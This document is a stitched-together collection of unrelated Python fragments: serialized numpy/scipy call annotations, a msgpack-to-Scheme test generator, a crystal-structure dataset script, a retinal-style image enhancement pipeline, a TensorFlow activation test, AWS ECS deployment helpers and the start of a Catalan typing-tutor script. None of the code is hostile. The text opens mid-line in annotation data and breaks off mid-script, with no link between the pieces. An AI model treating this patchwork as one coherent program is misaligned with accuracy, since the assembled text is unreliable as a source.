"numpy.... | [((1014, 1070), 'scipy.stats.multivariate_normal.logpdf', 'multivariate_normal.logpdf', (['(1)', '(1)', '(1)'], {'allow_singular': '(True)'}), '(1, 1, 1, allow_singular=True)\n', (1040, 1070), False, 'from scipy.stats import norm, multivariate_normal\n'), ((1685, 1701), 'numpy.atleast_1d', 'np.atleast_1d', (['u'], {}), '(u)\n', (1698, 1701), True, 'import numpy as np\n'), ((2916, 2934), 'numpy.atleast_2d', 'np.atleast_2d', (['cov'], {}), '(cov)\n', (2929, 2934), True, 'import numpy as np\n'), ((2996, 3011), 'math.sqrt', 'math.sqrt', (['dist'], {}), '(dist)\n', (3005, 3011), False, 'import math\n'), ((4342, 4392), 'scipy.stats.multivariate_normal.logpdf', 'multivariate_normal.logpdf', (['flat_x', 'flat_mean', 'cov'], {}), '(flat_x, flat_mean, cov)\n', (4368, 4392), False, 'from scipy.stats import norm, multivariate_normal\n'), ((9920, 10127), 'warnings.warn', 'warnings.warn', (['"""This was implemented before SciPy version 0.14, which implemented scipy.stats.multivariate_normal. This function will be removed in a future release of FilterPy"""', 'DeprecationWarning'], {}), "(\n 'This was implemented before SciPy version 0.14, which implemented scipy.stats.multivariate_normal. 
This function will be removed in a future release of FilterPy'\n , DeprecationWarning)\n", (9933, 10127), False, 'import warnings\n'), ((10472, 10488), 'scipy.sparse.issparse', 'sp.issparse', (['cov'], {}), '(cov)\n', (10483, 10488), True, 'import scipy.sparse as sp\n'), ((10623, 10664), 'math.exp', 'math.exp', (['(-0.5 * (norm_coeff + numerator))'], {}), '(-0.5 * (norm_coeff + numerator))\n', (10631, 10664), False, 'import math\n'), ((11834, 11848), 'numpy.asarray', 'np.asarray', (['c1'], {}), '(c1)\n', (11844, 11848), True, 'import numpy as np\n'), ((11858, 11872), 'numpy.asarray', 'np.asarray', (['c2'], {}), '(c2)\n', (11868, 11872), True, 'import numpy as np\n'), ((11882, 11896), 'numpy.asarray', 'np.asarray', (['m1'], {}), '(m1)\n', (11892, 11896), True, 'import numpy as np\n'), ((11906, 11920), 'numpy.asarray', 'np.asarray', (['m2'], {}), '(m2)\n', (11916, 11920), True, 'import numpy as np\n'), ((11936, 11958), 'numpy.linalg.inv', 'np.linalg.inv', (['(C1 + C2)'], {}), '(C1 + C2)\n', (11949, 11958), True, 'import numpy as np\n'), ((12501, 12514), 'scipy.linalg.svd', 'linalg.svd', (['P'], {}), '(P)\n', (12511, 12514), True, 'import scipy.linalg as linalg\n'), ((12533, 12561), 'math.atan2', 'math.atan2', (['U[1, 0]', 'U[0, 0]'], {}), '(U[1, 0], U[0, 0])\n', (12543, 12561), False, 'import math\n'), ((13448, 13467), 'numpy.linalg.eigh', 'np.linalg.eigh', (['cov'], {}), '(cov)\n', (13462, 13467), True, 'import numpy as np\n'), ((14248, 14264), 'numpy.isscalar', 'np.isscalar', (['var'], {}), '(var)\n', (14259, 14264), True, 'import numpy as np\n'), ((14298, 14310), 'numpy.sqrt', 'np.sqrt', (['var'], {}), '(var)\n', (14305, 14310), True, 'import numpy as np\n'), ((15402, 15416), 'numpy.isscalar', 'np.isscalar', (['x'], {}), '(x)\n', (15413, 15416), True, 'import numpy as np\n'), ((15529, 15545), 'numpy.atleast_2d', 'np.atleast_2d', (['x'], {}), '(x)\n', (15542, 15545), True, 'import numpy as np\n'), ((15940, 15960), 'random.gauss', 'random.gauss', (['(0)', 'std'], 
{}), '(0, std)\n', (15952, 15960), False, 'import random\n'), ((1093, 1357), 'warnings.warn', 'warnings.warn', (['"""You are using a version of SciPy that does not support the allow_singular parameter in scipy.stats.multivariate_normal.logpdf(). Future versions of FilterPy will require a version of SciPy that implements this keyword"""', 'DeprecationWarning'], {}), "(\n 'You are using a version of SciPy that does not support the allow_singular parameter in scipy.stats.multivariate_normal.logpdf(). Future versions of FilterPy will require a version of SciPy that implements this keyword'\n , DeprecationWarning)\n", (1106, 1357), False, 'import warnings\n'), ((3280, 3292), 'numpy.dot', 'np.dot', (['H', 'x'], {}), '(H, x)\n', (3286, 3292), True, 'import numpy as np\n'), ((4264, 4330), 'scipy.stats.multivariate_normal.logpdf', 'multivariate_normal.logpdf', (['flat_x', 'flat_mean', 'cov', 'allow_singular'], {}), '(flat_x, flat_mean, cov, allow_singular)\n', (4290, 4330), False, 'from scipy.stats import norm, multivariate_normal\n'), ((7920, 7973), 'math.exp', 'math.exp', (['(-(mean1 - mean2) ** 2 / (2 * (var1 + var2)))'], {}), '(-(mean1 - mean2) ** 2 / (2 * (var1 + var2)))\n', (7928, 7973), False, 'import math\n'), ((7991, 8029), 'math.sqrt', 'math.sqrt', (['(2 * math.pi * (var1 + var2))'], {}), '(2 * math.pi * (var1 + var2))\n', (8000, 8029), False, 'import math\n'), ((12587, 12602), 'math.sqrt', 'math.sqrt', (['s[0]'], {}), '(s[0])\n', (12596, 12602), False, 'import math\n'), ((12629, 12644), 'math.sqrt', 'math.sqrt', (['s[1]'], {}), '(s[1])\n', (12638, 12644), False, 'import math\n'), ((13962, 13978), 'numpy.isscalar', 'np.isscalar', (['std'], {}), '(std)\n', (13973, 13978), True, 'import numpy as np\n'), ((14066, 14087), 'numpy.isscalar', 'np.isscalar', (['interval'], {}), '(interval)\n', (14077, 14087), True, 'import numpy as np\n'), ((14974, 14988), 'math.sqrt', 'math.sqrt', (['var'], {}), '(var)\n', (14983, 14988), False, 'import math\n'), ((15618, 15639), 
'numpy.linalg.cholesky', 'np.linalg.cholesky', (['x'], {}), '(x)\n', (15636, 15639), True, 'import numpy as np\n'), ((15973, 16007), 'random.gammavariate', 'random.gammavariate', (['(0.5 * df)', '(2.0)'], {}), '(0.5 * df, 2.0)\n', (15992, 16007), False, 'import random\n'), ((1573, 1599), 'numpy.asarray', 'np.asarray', (['u'], {'dtype': 'dtype'}), '(u, dtype=dtype)\n', (1583, 1599), True, 'import numpy as np\n'), ((3239, 3253), 'numpy.dot', 'np.dot', (['P', 'H.T'], {}), '(P, H.T)\n', (3245, 3253), True, 'import numpy as np\n'), ((4198, 4211), 'numpy.asarray', 'np.asarray', (['x'], {}), '(x)\n', (4208, 4211), True, 'import numpy as np\n'), ((10236, 10268), 'numpy.array', 'np.array', (['x'], {'copy': '(False)', 'ndmin': '(1)'}), '(x, copy=False, ndmin=1)\n', (10244, 10268), True, 'import numpy as np\n'), ((10288, 10321), 'numpy.array', 'np.array', (['mu'], {'copy': '(False)', 'ndmin': '(1)'}), '(mu, copy=False, ndmin=1)\n', (10296, 10321), True, 'import numpy as np\n'), ((10399, 10420), 'math.log', 'math.log', (['(2 * math.pi)'], {}), '(2 * math.pi)\n', (10407, 10420), False, 'import math\n'), ((10421, 10443), 'numpy.linalg.slogdet', 'np.linalg.slogdet', (['cov'], {}), '(cov)\n', (10438, 10443), True, 'import numpy as np\n'), ((11966, 11985), 'numpy.dot', 'np.dot', (['C1', 'sum_inv'], {}), '(C1, sum_inv)\n', (11972, 11985), True, 'import numpy as np\n'), ((14140, 14163), 'scipy.stats.norm.interval', 'norm.interval', (['interval'], {}), '(interval)\n', (14153, 14163), False, 'from scipy.stats import norm, multivariate_normal\n'), ((15004, 15043), 'scipy.stats.norm.cdf', 'norm.cdf', (['x_range[0]'], {'loc': 'mu', 'scale': 'std'}), '(x_range[0], loc=mu, scale=std)\n', (15012, 15043), False, 'from scipy.stats import norm, multivariate_normal\n'), ((15061, 15100), 'scipy.stats.norm.cdf', 'norm.cdf', (['x_range[1]'], {'loc': 'mu', 'scale': 'std'}), '(x_range[1], loc=mu, scale=std)\n', (15069, 15100), False, 'from scipy.stats import norm, multivariate_normal\n'), ((15506, 
15515), 'numpy.eye', 'np.eye', (['n'], {}), '(n)\n', (15512, 15515), True, 'import numpy as np\n'), ((16024, 16041), 'math.sqrt', 'math.sqrt', (['(y / df)'], {}), '(y / df)\n', (16033, 16041), False, 'import math\n'), ((2972, 2978), 'numpy.linalg.inv', 'inv', (['S'], {}), '(S)\n', (2975, 2978), False, 'from numpy.linalg import inv\n'), ((4122, 4138), 'numpy.asarray', 'np.asarray', (['mean'], {}), '(mean)\n', (4132, 4138), True, 'import numpy as np\n'), ((5478, 5491), 'numpy.shape', 'np.shape', (['pdf'], {}), '(pdf)\n', (5486, 5491), True, 'import numpy as np\n'), ((12005, 12024), 'numpy.dot', 'np.dot', (['C2', 'sum_inv'], {}), '(C2, sum_inv)\n', (12011, 12024), True, 'import numpy as np\n'), ((12045, 12064), 'numpy.dot', 'np.dot', (['C1', 'sum_inv'], {}), '(C1, sum_inv)\n', (12051, 12064), True, 'import numpy as np\n'), ((10510, 10532), 'scipy.sparse.linalg.spsolve', 'spln.spsolve', (['cov', 'err'], {}), '(cov, err)\n', (10522, 10532), True, 'import scipy.sparse.linalg as spln\n'), ((10574, 10599), 'numpy.linalg.solve', 'np.linalg.solve', (['cov', 'err'], {}), '(cov, err)\n', (10589, 10599), True, 'import numpy as np\n'), ((17044, 17057), 'scipy.linalg.inv', 'linalg.inv', (['p'], {}), '(p)\n', (17054, 17057), True, 'import scipy.linalg as linalg\n'), ((5424, 5437), 'numpy.asarray', 'np.asarray', (['x'], {}), '(x)\n', (5434, 5437), True, 'import numpy as np\n')] |
import msgpack
ASSERT_TEMPLATE = """
(test-group "%(name)s"
(test "unpack" %(chicken_expr)s (unpack/from-blob (byte-blob %(blob)s)))
(test "pack" (pack/to-blob %(chicken_expr)s) (byte-blob %(blob)s)))
"""
def asChickenAssertion(data, chicken_expr=None, name=None):
    """Render a CHICKEN Scheme test-group asserting that *data* round-trips
    through msgpack.

    `chicken_expr` is the Scheme literal expected from unpacking; when
    omitted (None) the Python value itself is interpolated. `name` labels
    the test group and falls back to str(data) when falsy.
    """
    packed = msgpack.dumps(data)
    # hex() yields e.g. '0x2a'; Scheme spells hex literals '#x2a', so the
    # leading '0' becomes '#'.
    blob = ' '.join(hex(byte).replace('0', '#', 1) for byte in packed)
    return ASSERT_TEMPLATE % {
        "name": name if name else str(data),
        "blob": blob,
        "chicken_expr": data if chicken_expr is None else chicken_expr
    }
# Copy the hand-written Scheme prologue into a fresh reference-test file;
# the append_assert() calls below regenerate the assertions beneath it.
header = open("tests/python-ref-header.scm").readlines()
# NOTE(review): test_ref_file is deliberately left open for the writes
# below and is never explicitly closed -- the script relies on interpreter
# exit to flush it.
test_ref_file = open("tests/python-ref-tests.scm", "w")
test_ref_file.writelines(header)
def append_assert(*args, **kwargs):
test_ref_file.write(asChickenAssertion(*args, **kwargs))
append_assert( -1)
append_assert(-100)
append_assert(100)
append_assert(100102831903)
append_assert(-100102831903)
append_assert(1.3313)
append_assert([], "'#()")
append_assert([10, True, ["hi"]], """'#(10 #t #("hi"))""")
append_assert(
msgpack.ExtType(42, 'a'.encode('utf8')),
"""(make-extension 42 (string->byte-blob "a"))""")
| [
"msgpack.dumps"
] | [((325, 344), 'msgpack.dumps', 'msgpack.dumps', (['data'], {}), '(data)\n', (338, 344), False, 'import msgpack\n')] |
'''
Script to pull in set of cif files and make a single dataframe .
@author: pmm
'''
import numpy as np
import os
import sys
sys.path.append('../')
import pyXtal as pxt
from pyXtal.csp_utils.dataset_io import parse_filenames
import pandas as pd
# Directories of CIF files, one per molecule family, to merge into the dataset.
dirs = ['/Users/pmm/Documents/xtal_learning/triptycene/cifs/T2',
        '/Users/pmm/Documents/xtal_learning/triptycene/cifs/ring3',
        '/Users/pmm/Documents/xtal_learning/triptycene/cifs/ring32',
        '/Users/pmm/Documents/xtal_learning/triptycene/cifs/ring34',
        '/Users/pmm/Documents/xtal_learning/triptycene/cifs/ring39'
        ]
frames = []
# Loop variable renamed from `dir` so it no longer shadows the builtin dir().
for cif_dir in dirs:
    # Parse the filename-encoded metadata (energy, density) for each cif file.
    _df = parse_filenames(cif_dir, keys=['_', 'Energy', 'Density'])
    _df.set_index("Name", inplace=True)
    frames.append(_df)
# One dataframe over all families, indexed by structure name.
df = pd.concat(frames)
df.to_pickle('/Users/pmm/Documents/xtal_learning/triptycene/cifs/data_triptycene_set')
"pyXtal.csp_utils.dataset_io.parse_filenames",
"sys.path.append",
"pandas.concat"
] | [((127, 149), 'sys.path.append', 'sys.path.append', (['"""../"""'], {}), "('../')\n", (142, 149), False, 'import sys\n'), ((758, 775), 'pandas.concat', 'pd.concat', (['frames'], {}), '(frames)\n', (767, 775), True, 'import pandas as pd\n'), ((634, 687), 'pyXtal.csp_utils.dataset_io.parse_filenames', 'parse_filenames', (['dir'], {'keys': "['_', 'Energy', 'Density']"}), "(dir, keys=['_', 'Energy', 'Density'])\n", (649, 687), False, 'from pyXtal.csp_utils.dataset_io import parse_filenames\n')] |
# -*- coding: utf-8 -*-
#!/usr/bin/env python3
"""
Created on Tue Oct 16 14:53:15 2018
@author: yansl
Note:
synthesize the whole procedure
"""
import os
import shutil
import gc
import cv2
import time
import mask_maker
import image_fill
import discreteness_boundary_repair
import filter_enhancement
#%%
def file_operation(folder_name):
    """Create (or recreate) a results folder under the current working directory.

    Any existing folder of the same name is deleted first so results from a
    previous run never mix with the new ones.

    Parameters
    ----------
    folder_name : str
        Name of the results folder to create.

    Returns
    -------
    str
        Forward-slash path of the created folder, with a trailing '/'.
    """
    pwd = os.getcwd().strip()
    # Normalise Windows-style paths to forward slashes before appending.
    save_path = pwd.rstrip('\\').replace('\\', '/') + '/' + folder_name
    # Wipe any leftover folder, then (re)create it - one makedirs covers
    # both the fresh and the recreated case.
    if os.path.exists(save_path):
        shutil.rmtree(save_path)
    os.makedirs(save_path)
    return save_path + '/'
def result_saving(image_name, folder_name, postfix, file):
    """Write *file* as an image called ``<image_name><postfix>`` inside *folder_name*."""
    target_path = folder_name + image_name + postfix
    cv2.imwrite(target_path, file)
    return None
#%%
def files_iteration():
    """Process every image in ./original_images and save all intermediate results."""
    started = time.time()
    # One output folder per intermediate product, wiped and recreated up front.
    saving_mask = file_operation('recovering_mask')
    saving_first = file_operation('first_filtered')
    saving_usm = file_operation('usm')
    saving_border = file_operation('border_adding_image')
    saving_recorrected = file_operation('recorrected_image')
    # Input images live next to this script in 'original_images'.
    image_path = os.getcwd().replace('\\', '/') + '/' + 'original_images'
    for images in os.listdir(image_path):
        full_path = os.path.join(image_path, images)
        if os.path.isdir(full_path):
            continue
        file = os.path.normcase(full_path)
        (recovering_mask, output, original_appearance_masking,
         usm_image, recorrected_image, image_name) = main(file)
        # (destination folder, filename suffix, image to write)
        outputs = (
            (saving_mask, '_recovering_mask.png', recovering_mask),
            (saving_first, '_first_filter_image.png', output),
            (saving_usm, '_usm.png', usm_image),
            (saving_border, '_border_adding_image.png', original_appearance_masking),
            (saving_recorrected, '_recorrected_image.png', recorrected_image),
        )
        for folder, postfix, result in outputs:
            result_saving(image_name, folder, postfix, result)
    lapse = time.time() - started
    print('time cost', lapse, 's')
    return None
def main(file):
    """Run the full enhancement pipeline on one image file.

    Parameters
    ----------
    file : str
        Path of the input image.

    Returns
    -------
    tuple
        (recovering_mask, output, original_appearance_masking, usm_image,
        recorrected_image, image_name): intermediate/final images plus the
        input's base name, used by the caller to name saved results.
    """
    # Read the input image with OpenCV (BGR layout).
    image = cv2.imread(file, cv2.IMREAD_COLOR)
    # Build the masks from the input; also yields a resized copy of the image.
    (resized_image, mask_out, direct_out) = mask_maker.mask(image)
    # Crop masks & image down to the masked region.
    (cropped_mask, cropped_image, cropped_direct_mask, original_appearance) = mask_maker.border_cropping(resized_image, mask_out, direct_out)
    # Drop the full-size intermediates early to bound peak memory.
    del image, mask_out, resized_image, direct_out
    gc.collect()
    # Add a border around the crop (border length fixed at 20 here).
    (mask_adding, image_adding, original_appearance_adding, coordinate) = mask_maker.border_adding(cropped_mask, cropped_image, original_appearance, border_length=20)
    # Reclaim the original-size masks & the masked images.
    (direct_mask_adding, original_appearance_masking) = mask_maker.border_corresponding(cropped_mask, cropped_direct_mask, original_appearance_adding, border_length=20)
    # FOV extraction; presumably fits an ellipse to the mask - see mask_maker.
    (ellipse_mask, ellipse) = mask_maker.FOV_adjustment(mask_adding)
    # Recovering masks & images for post-processing & testing.
    (recovering_mask, recorrected_image) = mask_maker.recovering(mask_adding, ellipse_mask, original_appearance_masking, direct_mask_adding)
    # Fill missing regions by reflection symmetry across the added border.
    (reflected_mask, reflected_image) = image_fill.reflection_symmetry(mask_adding, image_adding, coordinate, border_length=20)
    # Cut the region of interest down to the ellipse mask.
    (cut_mask, cut_image) = image_fill.circle_cutting(ellipse_mask, reflected_mask, reflected_image)
    # Fill the remaining circular gaps.
    filled_image = image_fill.circle_fill(cut_mask, cut_image, ellipse)
    # Repair discreteness artefacts along the boundary (magic constant 7;
    # presumably a kernel/neighbourhood size - confirm in border_repair).
    repaired_image = discreteness_boundary_repair.border_repair(cut_mask, filled_image, ellipse, 7)
    # Filter the filled image; `output` is the first-pass filtered result.
    (filtered_image, output) = filter_enhancement.filter_enhancement(repaired_image)
    # Unsharp-mask enhancement of the filtered image.
    usm_image = filter_enhancement.usm_enhancement(filtered_image)
    # Base file name (no directory, no extension) for naming saved results.
    core_name = os.path.split(file)[1]
    image_name = os.path.splitext(core_name)[0]
    return (recovering_mask, output, original_appearance_masking, usm_image, recorrected_image, image_name)
# Script entry point: run the full batch pipeline over ./original_images.
if __name__ == '__main__':
    files_iteration()
| [
"mask_maker.border_cropping",
"image_fill.reflection_symmetry",
"mask_maker.border_adding",
"filter_enhancement.usm_enhancement",
"mask_maker.FOV_adjustment",
"image_fill.circle_fill",
"filter_enhancement.filter_enhancement",
"os.path.exists",
"os.listdir",
"os.path.split",
"os.path.isdir",
"m... | [((422, 433), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (431, 433), False, 'import os\n'), ((892, 945), 'cv2.imwrite', 'cv2.imwrite', (['(folder_name + image_name + postfix)', 'file'], {}), '(folder_name + image_name + postfix, file)\n', (903, 945), False, 'import cv2\n'), ((1012, 1023), 'time.time', 'time.time', ([], {}), '()\n', (1021, 1023), False, 'import time\n'), ((1385, 1396), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (1394, 1396), False, 'import os\n'), ((1492, 1514), 'os.listdir', 'os.listdir', (['image_path'], {}), '(image_path)\n', (1502, 1514), False, 'import os\n'), ((2259, 2270), 'time.time', 'time.time', ([], {}), '()\n', (2268, 2270), False, 'import time\n'), ((2447, 2481), 'cv2.imread', 'cv2.imread', (['file', 'cv2.IMREAD_COLOR'], {}), '(file, cv2.IMREAD_COLOR)\n', (2457, 2481), False, 'import cv2\n'), ((2545, 2567), 'mask_maker.mask', 'mask_maker.mask', (['image'], {}), '(image)\n', (2560, 2567), False, 'import mask_maker\n'), ((2675, 2738), 'mask_maker.border_cropping', 'mask_maker.border_cropping', (['resized_image', 'mask_out', 'direct_out'], {}), '(resized_image, mask_out, direct_out)\n', (2701, 2738), False, 'import mask_maker\n'), ((2823, 2835), 'gc.collect', 'gc.collect', ([], {}), '()\n', (2833, 2835), False, 'import gc\n'), ((2965, 3061), 'mask_maker.border_adding', 'mask_maker.border_adding', (['cropped_mask', 'cropped_image', 'original_appearance'], {'border_length': '(20)'}), '(cropped_mask, cropped_image, original_appearance,\n border_length=20)\n', (2989, 3061), False, 'import mask_maker\n'), ((3176, 3292), 'mask_maker.border_corresponding', 'mask_maker.border_corresponding', (['cropped_mask', 'cropped_direct_mask', 'original_appearance_adding'], {'border_length': '(20)'}), '(cropped_mask, cropped_direct_mask,\n original_appearance_adding, border_length=20)\n', (3207, 3292), False, 'import mask_maker\n'), ((3350, 3388), 'mask_maker.FOV_adjustment', 'mask_maker.FOV_adjustment', (['mask_adding'], {}), '(mask_adding)\n', 
(3375, 3388), False, 'import mask_maker\n'), ((3501, 3602), 'mask_maker.recovering', 'mask_maker.recovering', (['mask_adding', 'ellipse_mask', 'original_appearance_masking', 'direct_mask_adding'], {}), '(mask_adding, ellipse_mask,\n original_appearance_masking, direct_mask_adding)\n', (3522, 3602), False, 'import mask_maker\n'), ((3676, 3767), 'image_fill.reflection_symmetry', 'image_fill.reflection_symmetry', (['mask_adding', 'image_adding', 'coordinate'], {'border_length': '(20)'}), '(mask_adding, image_adding, coordinate,\n border_length=20)\n', (3706, 3767), False, 'import image_fill\n'), ((3815, 3887), 'image_fill.circle_cutting', 'image_fill.circle_cutting', (['ellipse_mask', 'reflected_mask', 'reflected_image'], {}), '(ellipse_mask, reflected_mask, reflected_image)\n', (3840, 3887), False, 'import image_fill\n'), ((3929, 3981), 'image_fill.circle_fill', 'image_fill.circle_fill', (['cut_mask', 'cut_image', 'ellipse'], {}), '(cut_mask, cut_image, ellipse)\n', (3951, 3981), False, 'import image_fill\n'), ((4029, 4107), 'discreteness_boundary_repair.border_repair', 'discreteness_boundary_repair.border_repair', (['cut_mask', 'filled_image', 'ellipse', '(7)'], {}), '(cut_mask, filled_image, ellipse, 7)\n', (4071, 4107), False, 'import discreteness_boundary_repair\n'), ((4179, 4232), 'filter_enhancement.filter_enhancement', 'filter_enhancement.filter_enhancement', (['repaired_image'], {}), '(repaired_image)\n', (4216, 4232), False, 'import filter_enhancement\n'), ((4285, 4335), 'filter_enhancement.usm_enhancement', 'filter_enhancement.usm_enhancement', (['filtered_image'], {}), '(filtered_image)\n', (4319, 4335), False, 'import filter_enhancement\n'), ((658, 683), 'os.path.exists', 'os.path.exists', (['save_path'], {}), '(save_path)\n', (672, 683), False, 'import os\n'), ((695, 717), 'os.makedirs', 'os.makedirs', (['save_path'], {}), '(save_path)\n', (706, 717), False, 'import os\n'), ((738, 762), 'shutil.rmtree', 'shutil.rmtree', (['save_path'], {}), 
'(save_path)\n', (751, 762), False, 'import shutil\n'), ((772, 794), 'os.makedirs', 'os.makedirs', (['save_path'], {}), '(save_path)\n', (783, 794), False, 'import os\n'), ((1537, 1569), 'os.path.join', 'os.path.join', (['image_path', 'images'], {}), '(image_path, images)\n', (1549, 1569), False, 'import os\n'), ((1582, 1606), 'os.path.isdir', 'os.path.isdir', (['full_path'], {}), '(full_path)\n', (1595, 1606), False, 'import os\n'), ((1646, 1673), 'os.path.normcase', 'os.path.normcase', (['full_path'], {}), '(full_path)\n', (1662, 1673), False, 'import os\n'), ((4363, 4382), 'os.path.split', 'os.path.split', (['file'], {}), '(file)\n', (4376, 4382), False, 'import os\n'), ((4404, 4431), 'os.path.splitext', 'os.path.splitext', (['core_name'], {}), '(core_name)\n', (4420, 4431), False, 'import os\n')] |
import tensorflow as tf
from dltk.core.activations import leaky_relu
import numpy as np
def test_leaky_relu():
    """leaky_relu must pass a positive input through and scale a negative one by alpha."""
    alpha = tf.constant(0.1)
    pos_input = tf.constant(1.)
    neg_input = tf.constant(-1.)
    pos_out_op = leaky_relu(pos_input, alpha)
    neg_out_op = leaky_relu(neg_input, alpha)
    with tf.Session() as sess:
        out_1 = sess.run(pos_out_op)
        assert np.isclose(out_1, 1.), \
            'Got {} but expected {}'.format(out_1, 1.)
        out_2 = sess.run(neg_out_op)
        assert np.isclose(out_2, -0.1), \
            'Got {} but expected {}'.format(out_2, -0.1)
| [
"tensorflow.Session",
"tensorflow.constant",
"numpy.isclose",
"dltk.core.activations.leaky_relu"
] | [((130, 146), 'tensorflow.constant', 'tf.constant', (['(0.1)'], {}), '(0.1)\n', (141, 146), True, 'import tensorflow as tf\n'), ((164, 180), 'tensorflow.constant', 'tf.constant', (['(1.0)'], {}), '(1.0)\n', (175, 180), True, 'import tensorflow as tf\n'), ((197, 214), 'tensorflow.constant', 'tf.constant', (['(-1.0)'], {}), '(-1.0)\n', (208, 214), True, 'import tensorflow as tf\n'), ((233, 267), 'dltk.core.activations.leaky_relu', 'leaky_relu', (['test_inp_1', 'test_alpha'], {}), '(test_inp_1, test_alpha)\n', (243, 267), False, 'from dltk.core.activations import leaky_relu\n'), ((286, 320), 'dltk.core.activations.leaky_relu', 'leaky_relu', (['test_inp_2', 'test_alpha'], {}), '(test_inp_2, test_alpha)\n', (296, 320), False, 'from dltk.core.activations import leaky_relu\n'), ((331, 343), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (341, 343), True, 'import tensorflow as tf\n'), ((400, 422), 'numpy.isclose', 'np.isclose', (['out_1', '(1.0)'], {}), '(out_1, 1.0)\n', (410, 422), True, 'import numpy as np\n'), ((531, 554), 'numpy.isclose', 'np.isclose', (['out_2', '(-0.1)'], {}), '(out_2, -0.1)\n', (541, 554), True, 'import numpy as np\n')] |
import collections
import typing
from . import tags
from .iterators import chunked_iterable
from .models import Project
def list_cluster_arns_in_account(ecs_client):
    """
    Yield the ARN of every ECS cluster visible to *ecs_client*.
    """
    pages = ecs_client.get_paginator("list_clusters").paginate()
    for page in pages:
        for cluster_arn in page["clusterArns"]:
            yield cluster_arn
def list_service_arns_in_cluster(ecs_client, *, cluster):
    """
    Yield the ARN of every ECS service in *cluster*.
    """
    paginator = ecs_client.get_paginator("list_services")
    for page in paginator.paginate(cluster=cluster):
        for service_arn in page["serviceArns"]:
            yield service_arn
def describe_services(session):
    """
    Return descriptions (including tags) of every ECS service in the account.
    """
    ecs_client = session.client("ecs")
    descriptions = []
    for cluster in list_cluster_arns_in_account(ecs_client):
        service_arns = list_service_arns_in_cluster(ecs_client, cluster=cluster)
        # The DescribeServices API accepts at most 10 services per call.
        for service_set in chunked_iterable(service_arns, size=10):
            resp = ecs_client.describe_services(
                cluster=cluster,
                services=service_set,
                include=["TAGS"]
            )
            descriptions.extend(resp["services"])
    return descriptions
class NoMatchingServiceError(Exception):
    """No ECS service matched the requested service/environment tags."""
    pass
class MultipleMatchingServicesError(Exception):
    """More than one ECS service matched the requested service/environment tags."""
    pass
def find_matching_service(
    service_descriptions, *, service_id, environment_id
):
    """
    Return the single service description whose deployment tags match
    *service_id* and *environment_id*.

    Raises NoMatchingServiceError / MultipleMatchingServicesError when zero
    or several services carry the expected tags.
    """
    expected = {
        "deployment:service": service_id,
        "deployment:env": environment_id,
    }
    try:
        return tags.find_unique_resource_matching_tags(
            service_descriptions,
            expected_tags=expected
        )
    except tags.NoMatchingResourceError:
        raise NoMatchingServiceError(
            f"No matching service found for {service_id}/{environment_id}!"
        )
    except tags.MultipleMatchingResourcesError:
        raise MultipleMatchingServicesError(
            f"Multiple matching services found for {service_id}/{environment_id}!"
        )
def find_service_arns_for_release(
    *, project: Project, release, service_descriptions, environment_id
):
    """
    Map each image ID in *release* to the list of matching ECS service ARNs.
    Images without a configured repository or without a matching service get
    an empty list.
    """
    result = {}
    for image_id in release["images"]:
        result[image_id] = []
        try:
            service_ids = project.image_repositories[image_id].services
        except KeyError:
            continue
        for service_id in service_ids:
            try:
                matched = find_matching_service(
                    service_descriptions,
                    service_id=service_id,
                    environment_id=environment_id
                )
            except NoMatchingServiceError:
                continue
            result[image_id].append(matched["serviceArn"])
    return result
def deploy_service(session, *, cluster_arn, service_arn, deployment_label):
    """
    Force a new deployment of *service_arn* and tag it with *deployment_label*.
    """
    ecs_client = session.client("ecs")
    resp = ecs_client.update_service(
        cluster=cluster_arn,
        service=service_arn,
        forceNewDeployment=True
    )
    ecs_client.tag_resource(
        resourceArn=service_arn,
        tags=tags.to_aws_tags({"deployment:label": deployment_label})
    )
    service = resp["service"]
    return {
        "cluster_arn": service["clusterArn"],
        "service_arn": service["serviceArn"],
        "deployment_id": service["deployments"][0]["id"]
    }
def list_tasks_in_service(session, *, cluster_arn, service_name):
    """
    Given the name of a service, return a list of task descriptions for the
    tasks running within the service.

    DescribeTasks accepts at most 100 task ARNs per call, so the ARNs are
    described in batches of 100 instead of assuming they fit in one request
    (the previous code raised past 100 tasks).
    """
    ecs_client = session.client("ecs")
    task_arns = []
    paginator = ecs_client.get_paginator("list_tasks")
    for page in paginator.paginate(
        cluster=cluster_arn, serviceName=service_name
    ):
        task_arns.extend(page["taskArns"])
    tasks = []
    # Batch by the API limit; an empty ARN list simply skips the loop and
    # returns [], matching the old behaviour.
    for start in range(0, len(task_arns), 100):
        resp = ecs_client.describe_tasks(
            cluster=cluster_arn,
            tasks=task_arns[start:start + 100],
            include=["TAGS"]
        )
        tasks.extend(resp["tasks"])
    return tasks
def find_ecs_services_for_release(
    *,
    project: Project,
    service_descriptions: typing.List[typing.Dict],
    release: str,
    environment_id: str
):
    """
    Return a map (image ID) -> Dict(service ID -> ECS service description).
    Images without a configured repository, and services with no match in
    *service_descriptions*, are skipped.
    """
    matched_services = collections.defaultdict(dict)
    for image_id in release['images']:
        # Only images that have a repository configured can map to services.
        try:
            matched_image = project.image_repositories[image_id]
        except KeyError:
            continue
        for service_id in matched_image.services:
            try:
                service_description = find_matching_service(
                    service_descriptions=service_descriptions,
                    service_id=service_id,
                    environment_id=environment_id
                )
            except NoMatchingServiceError:
                continue
            matched_services[image_id] = {
                service_id: service_description
            }
    return matched_services
| [
"collections.defaultdict"
] | [((4927, 4956), 'collections.defaultdict', 'collections.defaultdict', (['dict'], {}), '(dict)\n', (4950, 4956), False, 'import collections\n')] |
# -*- coding: utf-8 -*-
#!/usr/bin/env python
import sys
import os
import subprocess
import pyttsx
from gtts import gTTS
import readchar
from PIL import Image
# Catalan ordinal words for positions 1-10 ("first" ... "tenth"), 0-indexed.
ordinals = ["primera", "segona", "tercera", "quarta", "cinquena", "sisena", "setena", "vuitena", "novena", "desena"]
def digues(frase):
    """Speak *frase* aloud in Catalan: synthesise with Google TTS, play with VLC."""
    speech = gTTS(text=frase, lang='ca')
    speech.save("frase.mp3")
    # Blocks until playback finishes, then VLC exits.
    os.system("vlc --play-and-exit --quiet frase.mp3")
    return
def ordinal(numero):
    """Return the Catalan ordinal word for 0-based *numero*, or "següent" from 10 on."""
    if numero >= 10:
        return "següent"
    return ordinals[numero]
print("JDH 27/08/2016 Bogotà")
print("Programa per ensenyar al Martí i a la Laia a escriure el seu nom (o un altre) en un teclat d'ordinador")
print("Command Line Arguments:" + str(len(sys.argv)))
